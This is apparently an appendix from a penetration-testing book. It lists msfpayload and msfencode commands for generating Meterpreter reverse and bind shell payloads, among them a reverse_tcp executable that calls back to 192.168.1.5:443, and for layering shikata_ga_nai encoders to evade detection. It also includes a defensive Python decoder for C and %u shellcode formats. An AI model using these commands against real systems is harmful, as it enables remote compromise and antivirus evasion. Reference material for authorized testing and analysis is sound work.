Appendix B

MSFpayload Commands

msfpayload -h

List available payloads.

msfpayload windows/meterpreter/bind_tcp O

List the available options for the windows/meterpreter/bind_tcp payload (all of these commands can be used with any payload).

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe

Create a Meterpreter reverse_tcp payload that connects back to 192.168.1.5 on port 443, and save it as a Windows Portable Executable named payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw

Same as above, but export in raw format. This raw output is what msfencode takes as input later.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c

Same as above but export as C-formatted shellcode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java

Export as %u-encoded JavaScript.
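The two text formats above, C-style "\xNN" escapes and JavaScript "%uXXXX" units, are what an analyst most often finds when a payload of this kind turns up embedded in a source file or a web page. The following is an added example, not code from the book or from the Metasploit project: it decodes both layouts back to the raw bytes so they can be hashed and compared against known samples. The %u format packs two bytes per unit in little-endian order (the low byte comes first), which is the detail most often gotten wrong when decoding by hand. The sample inputs are constructed and carry six harmless ASCII bytes, not a real payload.

```python
import hashlib
import re

# Constructed sample inputs (not real payload output): the same six bytes,
# "ABCDEF", laid out the way the C and JavaScript formats render them.
SAMPLE_C = r'''unsigned char buf[] =
"\x41\x42\x43"
"\x44\x45\x46";
'''
SAMPLE_JS = "%u4241%u4443%u4645"

_C_BYTE = re.compile(r'\\x([0-9a-fA-F]{2})')
_JS_UNIT = re.compile(r'%u([0-9a-fA-F]{4})')


def decode_c_shellcode(text: str) -> bytes:
    """Collect every \\xNN escape from a C-style buffer definition.

    Assumes the buffer is written entirely with \\xNN escapes, which is how
    the C output format lays it out; any other characters are ignored.
    """
    return bytes(int(h, 16) for h in _C_BYTE.findall(text))


def decode_unescape_js(text: str) -> bytes:
    """Decode %uXXXX units into bytes, little-endian within each unit.

    %u4241 therefore yields b"AB": the low byte 0x41 first, then 0x42.
    """
    out = bytearray()
    for unit in _JS_UNIT.findall(text):
        value = int(unit, 16)
        out.append(value & 0xFF)   # low byte
        out.append(value >> 8)     # high byte
    return bytes(out)


def summarize(blob: bytes) -> dict:
    """Length and SHA-256 of the decoded bytes, for matching against known samples."""
    return {"length": len(blob), "sha256": hashlib.sha256(blob).hexdigest()}


if __name__ == "__main__":
    for label, blob in (("C", decode_c_shellcode(SAMPLE_C)),
                        ("JS", decode_unescape_js(SAMPLE_JS))):
        print(label, summarize(blob))
```

Both decoders should produce identical bytes for the same payload; if they do not, the usual cause is reading the %u units big-endian. Note that the %u format pads an odd-length buffer to a whole unit, so a decoded JavaScript blob may carry one extra trailing byte compared with the C version.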

MSFencode Commands

msfencode -h

Display the msfencode help.

msfencode -l

List the available encoders.

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)

Format in which to output the encoded buffer.

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Create a multi-encoded payload by chaining two encoders: the raw payload is passed through x86/countdown five times, then through x86/shikata_ga_nai five times, and written out as an executable.

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.